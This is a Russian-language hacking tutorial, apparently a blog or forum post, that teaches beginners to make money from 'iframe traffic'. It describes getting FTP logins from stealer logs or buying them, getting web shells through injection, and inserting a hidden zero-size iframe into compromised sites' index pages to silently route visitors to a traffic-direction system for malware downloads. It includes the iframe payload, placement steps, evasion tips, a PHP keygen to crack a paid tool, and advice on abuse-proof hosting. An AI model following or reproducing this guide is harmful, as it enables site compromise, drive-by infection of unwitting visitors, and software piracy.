Общее о трафике:
Трафик В сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей
за оределённый промежуток времени (обычно за сутки). (c) Википедия
Трафик Бывает 2х типов
1)Ифрейм Трафик
2)Трафик для СЕО
Ифрейм (Iframe) трафик это трафик зачастую использующийся для хек целей,
таких как загрузки.
СЕО же трафик используеться для раскрутки ресурсов.
Трафик разделяется по странам
самые востребованные это AU-Австралия US-США UK-Великобритания DE-Германия IT-Италия
Трафик Бывает Бизнес и обычный, тут думаю объяснять не надо…
Так же очень популярно сейчас продавать Микс трафик, микс трафик это трафик состоящий из
трафика который идет с различных Стран, но все же большую ценность представляет трафик Отдельных стран
(За исключением Стран Бывшего СССР, Азии итп)

Зачем нужен трафик?
Как я писал выше Iframe трафик используеся для хек целей.
В основном для Загрузок (о них я напишу позже)
Ни для кого не секрет что Загрузки и Трафик являются одним из самых популярных
способов Хек заработка, на любом сайте с разделом Купля продажа (на тему Компьютерной Безопасности)
можно увидеть посты типа “Продаю Траф”,”Качественные загрузки”,”Куплю Uk траф или загрузы”
И как можно Увидеть такие вещи стоят прилично (по крайней мере для новичков в этом деле)
Несмотря на большое количество продавцов Трафика на него всегда есть спрос.
И если вы начнете заниматься продажами трафика у вас всегда будет работа, и деньги

Как его добыть ?
Добывается трафик по разному:
1)С ломаных Сайтов
2)С белых ресурсов
3)С Доров
4)со спам рассылок
Iframe трафик добываеться лишь первым методом.
Опять же в разделах купля продажа вы можете увидить сообщения типа “Куплю Фтп”,”Продам Фтп”,”Скупаю Шеллы”
Итак вы наверное уже поняли что бы иметь трафик надо иметь фтп или шеллы
Думаю что такое FTP доступ вы знаете, а про шелл поподробнее можете прочитать тут
И так Как же нам достать Фтп или шеллы, Ну это уже зависит от вас, Самые известные способы
это снимать ftp с отчетов Пинча или покупать, а с шеллами все сложнее, это уже нужно иметь навык в SQL и PHP
инъекциях. Да но если вы это не умете, не стоит сразу вариант с шеллом оставлять до лучших времен…

Что делать с Этими FTP и Шеллами О_о
Ну теперь я поведаю вам великую тайну, что такое iframе,
IFrame - “плавающий” или встроенный фрейм. Iframe позволяет нам вставить один html(php)-документ в другой html(php)-документ.
Ну это все заумные понятия, объясню по быстрому, ифрейм в хеке это код который вписывается в страницу сайта (какую либо, зачастую в индекс)
что бы все зашедшие на сайт юзеры заходили параллельно на другой ресурс (который указан во фрейме), при этом не ведая этого ))
Вообщем объяснил как смог, без заумных слов. Пример ифрейма:
<iframe src="http://yoursite.ru/tds/index.php" width="0"
height="0" frameborder="0"></iframe>

И так разберем его по кускам
< - тег начала кода
iframe src=”http://yoursite.ru/tds/index.php” - именно тут указывается куда будут заходить параллельно посетители, кавычки обязательны!
width=”0″ height=”0″ frameborder=”0″ - это тоже неотъемлемая часть ифрейма, означает что длина высота = 0, а фреймбордер убирает границу фрейма
Благодаря этим параметрам фрейм на странице абсолютно на заметен, как бы ты не приглядывался ))
</iframe> - Конец фрейма
Итак когда рассмотрели что такое ифрейм, разберем что же с этим чудесным кодом делать?
Допустим вы уже Добыли ФТП и теперь можете на него зайти, что бы иметь трафик нужно поставить фрейм
вы заходите на фтп (НЕЗАБЫВАЙТЕ О БЕЗОПАСНОСТИ ЮЗАЙТЕ ПРОСКСИ, СОКСЫ ИЛИ ВПН) заходите в директорию
где расположен сайт, обычно это htdocs www или папка с именем домена типа - name.ru
Зашедши в папку вы видите множество файлов, выбираете файл index или в редких случаях home, main.. файл может быть
как с php так и html расширением. открываете его и вставляете ифрейм, с названием
<iframe src="http://yoursite.ru/tds/index.php" width="0" height="0"
frameborder="0"></iframe>

где yoursite.ru это ваш файл tds/index.php это папка и файл куда будет идти трафик. Затем Сохраняете файл и вот у вас есть трафик!
Про шелл можно много рассказать, Вкратце шелл скрипт, который позволяет при наличии прав, редактировать файлы на фтп, и лазить по папкам
и еще мноооого чего другого не относящегося к этой теме. А редактирование для нас самое главное
Подробнее про шелл тут
З.Ы. чем больше посещаемость сайта тем больше трафика у вас…
Это Конечно хорошо что вы научились ставить фреймы, но это кажется напряжным, если клиент закажет менять фрейм, или ставить фрейм куда стекается траф
да и вообще так не удобно, НО у нас есть одна замечательная штука, называется она TDS (Traffic Direct System)

Что такое ТДС и с чем его едят?
ТДС - это система для управления трафиком.
Если говорить кратко, то ТДС это скрипт, в который сливается трафик из различных источников. Система распределяет полученный трафик следуя правилам установленным хозяином скрипта.
Таким образом хозяин получает полную статистику и полный контроль над всем своим трафиком из одного скрипта.
На данный момент существует много ТДС предоставлю пару бесплатных тдс
1)TDS от Kallisto
2)Advanced TDS
1я тдс имеет одну уязвимость, о том чего она касаеться и как исправить можно почитать на Вбх.
2я тдс является платной, но тут есть один небольшой ключик, качаете ее а затем в файл key.php прописываем следующее
<?php   function genkey ($key)

{

$kx = 193;

$kp = 149;

$p = 0;

$r = '';

$p =0;

$ps = 0;

while ($p<= strlen ($key) - 1)

{

$d = $key[$p];

$d=ord($d);

$d=$d^$kx;

$d = $d + $ps + $kp;

$r= "000".$d.$r;

++$ps;

$p++ ;

}    return $r;

}

$key=genkey($_SERVER['HTTP_HOST']);

?>

И получаем полностью рабочую ТДС )
Пара других ТДС тут
Как пользоваться ТДС тут я писать не буду, ибо получиться очень емкая статья, на данный момент лучшей тдс является Sutra TDS

Ну вот теперь казалось все есть для того что бы продавать трафик, но кажется чего то не хватает… ах да, хоста
куда будет сливаться трафик!

Хост
Ну думаю что такое хостинг и хост знают все, я лишь дам пару советов:
1)Лучше всего делать хост похожим на какой либо счетчик
или банерообменник или еще что что бы админ подумал что так надо, потому что много админов не делали свои сайты а лишь заказывали,
потому нужно ли оно или нет они не знают.
2)Покупайте Абузоустойчивый хост, он лучше всего, почему да потому что сколько бы админы не жаловались хостеру они все равно не накроют хост.(c) Sharingan

http://vingrad.ru/blogs/dominus/iframe- … novichkov/